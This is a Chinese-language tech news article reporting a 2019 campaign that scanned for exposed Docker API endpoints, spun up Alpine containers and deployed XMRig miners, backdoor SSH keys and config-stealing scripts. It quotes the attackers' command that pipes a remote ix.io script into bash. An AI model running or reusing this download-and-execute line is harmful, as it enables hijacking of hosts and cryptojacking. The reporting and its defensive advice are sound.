你在使用哪种编程语言?快来投票,亲手选出你心目中的编程语言之王 了解详情
写点什么

黑客组织劫持 Docker 系统挖掘加密货币

2019 年 11 月 29 日

黑客组织劫持 Docker 系统挖掘加密货币


现在都快 2020 年了,但还有不少系统管理员,仍然将 Docker 管理端口暴露在互联网上。


目前,有家黑客组织正在互联网上进行大规模的扫描,试图寻找那些在互联网上暴露了 API 端点的 Docker 平台。


黑客组织这次扫描行动的目的,是让他们能够向 Docker 实例发送命令,并在公司的 Docker 实例上部署加密货币挖矿程序,最终利用他们的算力进行挖矿,从而为黑客组织自身带来利益。


专业行动

这次大规模扫描行动于 11 月 24 日开始,由于扫描行动的规模极其庞大,因此一开始就立即引起了人们的注意。


Bad Packets LLC 的首席研究官兼联合创始人 Troy Mursch 对 ZDNet 称:“Bad Packets CTI API 的用户应该清楚利用暴露的 Docker 实例进行攻击并非什么新鲜事,而且这种行为经常发生。”


他指出,“黑客组织这次行动的不同之处在于,他们这次扫描行动规模特别夸张。仅此一点,就值得我们进一步调查,分析他们利用僵尸网络的意图究竟是什么。”


作为本次扫描行动的发现者,Mursch 说:“正如其他人指出的,这次行动的规模可不是那种脚本攻击的小孩把戏。黑客组织在这次扫描行动中投入了大量精力,但我们还没有搞清楚他们到底想干什么。”


推特用户 Bad Packets Report(@bad_packets)在 11 月 25 日发推文称:


这是一场扫描互联网上暴露的 Docker API 端点的随机性大规模扫描行动。

这些扫描行动利用 Alpine Linux 映像来创建一个容器,并通过以下方式执行有效负载:

"Command": chroot /mnt /bin/sh -c 'curl -sL4 https://t.co/q047bRPUyj | bash;'



目前我们所掌握的情况

到目前为止,我们所知道的是,这些攻击背后的组织正在扫描超过 59000 个 IP 网络(网络块),试图寻找暴露的 Docker 实例。


一旦黑客组织识别出暴露的主机后,攻击者就会使用 API 端点启动 Alpine Linux OS 容器,并在其中执行以下命令:


chroot /mnt /bin/sh -c 'curl -sL4 http://ix.io/1XQa | bash;
复制代码


上面的命令从攻击者的服务器下载并运行一份 Bash 脚本。这个脚本的作用就是在目标设备上安装一个经典 XMRRig 加密货币的挖矿程序。Mursch 指出,在这次行动开始后的两天,黑客组织已经挖出了 14.82 枚门罗币(XMR),其价格略高于 740 美元。



此外,Mursch 还发现,这种恶意扫描行动还有某种自我防御的机制。


Mursch 告诉我们:“这次黑客行动,虽然并非原创,但我们观察到一个有趣的情况,就是黑客组织会从 http://ix.io/1XQh 下载脚本来卸载已知的监视代理程序并杀死大量相关进程。”


Mursch 通过检查这个脚本,还发现黑客组织不仅正在试图禁用安全产品,还关闭了与竞争对手的加密货币挖矿僵尸网络(如 DDG)相关的 LSO 进程。


此外,Mursch 还发现,这个恶意脚本还有一个功能,就是它能够通过扫描受感染的主机来查找 rConfig 配置文件,并对其进行加密和窃取,然后将文件发送回黑客组织的服务器(一般是僵尸网络)。


此外,Sandfly Security 的创始人 Craig H. Rowland 也注意到,黑客组织还在被入侵的容器上创建后门账户,并留下 SSH 密钥以便更方便他们日后进行访问,这样,他们就可以从远程控制所有受感染的肉鸡目标。


Mursch 建议,运行 Docker 实例的用户和组织,应立即检查自己是否在互联网上公开了 API 端点,如果已经公开,就立即关闭端口,然后关停无法识别的运行中的容器。


作者介绍:


Catalin Cimpanu,ZDNet 的信息安全记者,负责报道网络安全、数据泄露、黑客攻击和其他相关话题。此前曾担任 Bleeping Computer 和 Softpedia 的信息安全记者。


原文链接:


A hacking group is hijacking Docker systems with exposed API endpoints


2019 年 11 月 29 日 13:531202

评论

发布
暂无评论
发现更多内容

HashData多集群共享统一存储架构

HashData

数字经济时代,区块链能否担当产业数字化转型核心赋能者?

旺链科技

区块链数字经济 区块链发展

江苏交通控股打造IT架构云转型下的智慧交通

HashData

大作业

胡益

【2021 ECUG Con】聚势而来,与你相约花开时

小剑客

区块链 云计算 大数据 开源 go语言

2021年爆锤39K月薪Offer!阿里巴巴Java面试(知识点)整理

Java架构之路

Java 程序员 架构 面试 编程语言

终于学完国内算法第一人10年经验总结的数据结构与算法详解文档

Java架构之路

Java 程序员 架构 面试 编程语言

COPU助力北大研究生开源公选课丨开源PostgreSQL研发课程成功进入北京大学

PostgreSQLChina

数据库 postgresql 开源 开源社区

云算力矿池挖矿系统开发技术

薇電13O25249123

[TcaplusDB知识库]键值型数据库TcaplusDB是如何进行数据读写的?

TcaplusDB

数据库 nosql 后端 TcaplusDB Tcaplus

我用一个小小的开放设计题,干掉了40%的面试候选人

架构精进之路

Web 安全 软件设计 3月日更

真香!Github一夜爆火,阿里性能优化不传之秘终于开源

周老师

Java 编程 程序员 架构 面试

万字长文,肝了一下午的线程池详解!

JavaFish

Java 多线程 线程池 线程池工作原理

盘点一下我用kafka两年以来踩过的一些非比寻常的坑

周老师

Java kafka 编程 程序员 架构

HashData外部表的实现与应用

HashData

快了何止300%?阿里巴巴Java优化:设计+程序+并行+JVM+工具

Java架构追梦

Java 阿里巴巴 架构 面试 性能优化

我以为自己够牛逼了,直到看到了Alibaba专家的面试笔记,我学习了三个月,却入职京东,税前36K

Java成神之路

Java 程序员 架构 面试 编程语言

内推阿里Java技术岗4面:JVM+回收算法+并发编程+NIO/BIO+开源框架+索引+Redis缓存等

Java成神之路

Java 程序员 架构 面试 编程语言

寻找被遗忘的勇气(十一)

Changing Lin

3月日更

ZooKeeper 的选举机制,你了解多少?

云流

架构 分布式

《精通比特币》学习笔记(第七章)

棉花糖

区块链 学习笔记 3月日更

音乐信息检索:理性解构音乐

阿里云视频云

阿里云 算法 音频

举例出Java最常见的JVM+并发+MySQL+网络+Spring面试题,我靠着掌握这些拿到阿里offer(1到5年必看)

Java成神之路

Java 程序员 架构 面试 编程语言

2021年4款好用的音乐编曲软件推荐

奈奈的杂社

轻量级的接口自动化冒烟框架

小小娃爱吃甜食

自动化 测试 框架 自动化部署

Flink SQL CDC 实践以及一致性分析

Apache Flink

flink

最新蚂蚁五面、拼多多三面、字节四面(已入职拼多多),个人面经分享

Java架构之路

Java 程序员 架构 面试 编程语言

阿里P8手把手教你!万字Android技术类校招面试题汇总,附赠课程+题库

欢喜学安卓

android 程序员 面试 移动开发

一周信创舆情观察(3.1~3.7)

统小信uos

Elasticsearch Inverted Index

escray

elastic 28天写作 死磕Elasticsearch 60天通过Elastic认证考试 3月日更

如何用一个月的时间啃完英语词典?

wbliu85

技术为帆,纵横四海- Lazada技术东南亚探索和成长之旅

技术为帆,纵横四海- Lazada技术东南亚探索和成长之旅

黑客组织劫持 Docker 系统挖掘加密货币-InfoQ